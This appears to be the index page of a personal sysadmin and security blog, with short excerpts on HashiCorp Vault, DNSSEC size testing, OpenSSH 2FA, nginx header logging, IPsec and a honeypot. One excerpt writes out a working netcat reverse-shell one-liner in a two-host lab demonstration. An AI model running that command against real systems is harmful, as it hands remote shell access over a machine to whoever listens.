Security

Hashicorp - Vault

Some hands-on with HashiCorp Vault.
Source: https://developer.hashicorp.com/vault/docs/get-started/developer-qs
Install on macOS:
    brew tap hashicorp/tap
    brew install hashicorp/tap/vault
Run on Docker in the background (you have to kill it later):
    docker run -d -p 8200:8200 -e 'VAULT_DEV_ROOT_TOKEN_ID=dev-only-token' vault
    Unseal Key: 2KTIMp0Md52V2xTb0txxxxxxxxxxxxxxxxxxxxxxxxx=
    Root Token: dev-only-token
This is a dev instance only and has no persistent data. Don’t worry.
Open browser: http://localhost:8200 -> root token
Export in terminal:
    export VAULT_ADDR='http://0.0.0.0:8200'
    export VAULT_TOKEN="dev-only-token"
Set key:
    curl --header "X-Vault-Token: $VAULT_TOKEN" \
      --header "Content-Type: application/json" \
      --request POST \
      --data '{"data": {"password": "Hashi123"}}' \
      -s http://127.

OpenBSD - ReverseShell

Reverse Shells
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://kb.systemoverlord.com/security/postex/reverse/
Test it
Listen on Host A: set the listener on Host A (192.168.1.100)
    hostA # nc -l 4242
Start Reverse Shell on Host B
    hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f
Here we are
    hostA # hostname
    hostA.somewhere
    hostA # nc -l 4242
    hostB # hostname
    hostB.somewhere
nice ;)

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCAN 2022: https://www.youtube.com/watch?v=1n62VZj-CKI
OARC Reply Size Tester
    dig +short rs.dns-oarc.net TXT
Host1 - good :)
    # dig +short rs.dns-oarc.net TXT
    rst.x4090.rs.dns-oarc.net.
    rst.x4058.x4090.rs.dns-oarc.net.
    rst.x4064.x4058.x4090.rs.dns-oarc.net.
    "45.15.80.80 DNS reply size limit is at least 4090"
    "45.15.80.80 sent EDNS buffer size 4096"
Host2 - bad :(
    # dig +short rs.dns-oarc.net TXT
    rst.x1196.rs.dns-oarc.net.
    rst.x1206.x1196.rs.dns-oarc.net.
    rst.x1204.x1206.x1196.rs.dns-oarc.net.
    "74.63.25.240 DNS reply size limit is at least 1206"
    "74.63.25.240 sent EDNS buffer size 1232"

OpenBSD - Full Disk Encryption

Intro
I never used the Full Disk Encryption feature as there was no need for it. It doesn’t make sense for hosted VMs, as you have to enter the passphrase at every boot at the console. So, it’s a pain and still possible to intercept on the hoster’s infrastructure. Disk encryption does not make sense at home, as all my devices remain at home (and hopefully never get stolen). It would make sense on a notebook, but I’m more the Apple fanboy when it comes to portable machines.

OpenSSH 2FA Google Auth

Let’s give it a try with Alpine Linux, OpenSSH and 2FA with Google Authenticator.
Add packages
    apk add openssh openssh-server-pam google-authenticator openssh-doc google-authenticator-doc libqrencode
Configure GoogleAuth
    touch /etc/pam.d/sshd
    ln /etc/pam.d/sshd /etc/pam.d/sshd.pam
    cat << 'EOF' >> /etc/pam.d/sshd.pam
    account include base-account
    auth required pam_env.so
    auth required pam_nologin.so successok
    auth required /lib/security/pam_google_authenticator.so echo_verification_code grace_period=57600 nullok
    auth required pam_unix.so md5 sha512
    EOF
Update sshd_config
    cat << 'EOF' >> /etc/ssh/sshd_config
    PasswordAuthentication no
    AuthenticationMethods any
    UsePAM yes
    EOF
Restart SSHD
    service sshd restart
Setup user
    su - USERNAME
    google-authenticator
Response

Cisco Router, SSH, PubKey, ...

Intro
I stumbled across an old Cisco box in the basement. I thought I might have some fun (or frustration?) with the aging device. The hardware still works fine, right? And what about the software? Let’s give it a try!
Hardware
    show version
    Cisco 1841 (revision 7.0) with 352256K/40960K bytes of memory.
    Processor board ID FCZ1234757Y
    6 FastEthernet interfaces
    1 Virtual Private Network (VPN) Module
    DRAM configuration is 64 bits wide with parity disabled.

Kubernetes Multi-Juicer

If you ever wanna run a multiplayer OWASP Juice Shop CTF on your own, here are some notes and info for bloody beginners.
References
- https://github.com/iteratec/multi-juicer/
- https://www.digitalocean.com/
- https://kubernetes.io/de/docs/concepts/overview/what-is-kubernetes/
Prerequisite
- you’ve got a Digital Ocean account (or some other cloud provider)
- a spare domain, with its NS set to DigitalOcean
- Digital Ocean CMD line tools installed and configured
- helm tools (kubernetes package manager -> brew install helm)
- some budget (~2 CHF/Day)
- 30min for setup
btw.

Area 41

Area41
Looking forward to the next Security Congress in Zurich: https://www.area41.io. It has been sold out for a while, happy I got an early ticket :)
… and all the talks are online … https://www.youtube.com/watch?v=Hs5olUBX2cg&list=PLv-PXy2JVviu32C4U6F8KHKcyL4s-i_Fo

Nginx - Log Headers

How to enable logging with headers for Nginx
Assuming you have a running setup and you want to enable logging with headers for debug and learning purposes.
Add Lua
    doas pkg_add nginx-lua--
and you get …
    doas pkg_info -L nginx-lua--
    Information for inst:nginx-lua-1.20.1p0
    Files:
    /var/www/modules/ndk_http_module.so
    /var/www/modules/ngx_http_lua_module.so
Enable modules in /etc/nginx/nginx.conf: add two lines on top
    load_module "modules/ndk_http_module.so";
    load_module "modules/ngx_http_lua_module.so";
Enhance logging: add the following to the “http” section
    log_format log_req_resp '$remote_addr - $remote_user [$time_local] '
                            '"$request" $status $body_bytes_sent '
                            '"$http_referer" "$http_user_agent" '
                            '$request_time req_header:"$req_header" '
                            'resp_header:"$resp_header"';
Enable logging: add the following lines to your virtual host section

IPSEC OpenBSD <-> Linux

Environment
- OpenBSD 7.0
- Debian 11.2 with Strongswan
- IPv4 only
- IKE v1
ToDo
- IPv6 and Dualstack
- IKE v2
Debian ipsec.conf
    conn puffy
        authby = secret
        ike = aes256-sha256-modp2048
        keyexchange = ikev1
        ikelifetime = 1h
        keyingtries = 0
        left = %defaultroute
        right = 193.xx.xx.xx
        leftid = 212.xx.xx.xx
        rightid = 193.xx.xx.xx
        lifetime = 1200s
        leftsubnet = 10.11.1.8/30
        rightsubnet = 10.1.6.0/24
        esp = aes256-sha256-modp2048
        dpddelay = 30
        dpdtimeout = 120
        dpdaction = restart
        auto = start
OpenBSD /etc/sysctl.

AGE - Encrypt Files with SSH Keys

Stumbled upon something that I’ve missed for a long time: encrypting files with the ssh public key :)
Source: https://github.com/FiloSottile/age
Install Package
OpenBSD (and most other *nix systems) has a package for age. Just install it.
    doas pkg_add age
Asymmetric Encryption
Asymmetric encryption encrypts and decrypts the data using two separate yet mathematically connected cryptographic keys. These keys are known as a ‘Public Key’ and a ‘Private Key’. Together, they’re called a ‘Public and Private Key Pair’

CAS@OST

It’s time for some education and I decided to do a CAS CyberSecurity @OST (prev. HSR Rapperswil). I expect to learn a lot in Attacking, Defense, Reverse Engineering and so on. I think I already have a “good basic” in many of these topics. So, I expect to have an interesting time in the next few months. You can expect some posts here, or may I do another blog? -> started a new blog for the CAS

Honeypot

I like to run honeypots … ok, to be honest, it’s not a honeypot. It’s a productive machine for me, but all the bots trying to get in get redirected to a honeypot, the credentials are captured and last but not least, you can watch them live in your browser :) http://honeypot.nolink.ch btw. 100k failed login attempts in 10 days … have fun!

RPKI for Home Usage

Resource Public Key Infrastructure
You may know what RPKI is … It’s a PKI framework for improving security for the Internet routing infrastructure based on BGP. As a home user or small/medium size company, you normally don’t have a full BGP table and multiple upstream providers. You have one Internet router or firewall and you get a default route from your ISP. With OpenBGPD and the current rpki extensions, you “just” need a full BGP feed and then, you can filter all invalid ROAs and keep your routing (and Internet access) more secure.

RC3

Some cool movies/audios from “Remote Chaos Experience” RC3
RC3 Video, ordered by ViewCount
Amateurfunk hacken Spot the Surveillance DevOps Disasters 3.1 Elektrogruselkabinet Indien-Edition
36C3 - Boeing 737MAX: Automated Crashes
36C3 - BahnMining - Pünktlichkeit ist eine Zier
36C3 - Finfisher verklagen
36C3 - Hirne Hacken
35C3 - Du kannst alles hacken – du darfst dich nur nicht erwischen lassen
35C3 - Hackerethik - eine Einführung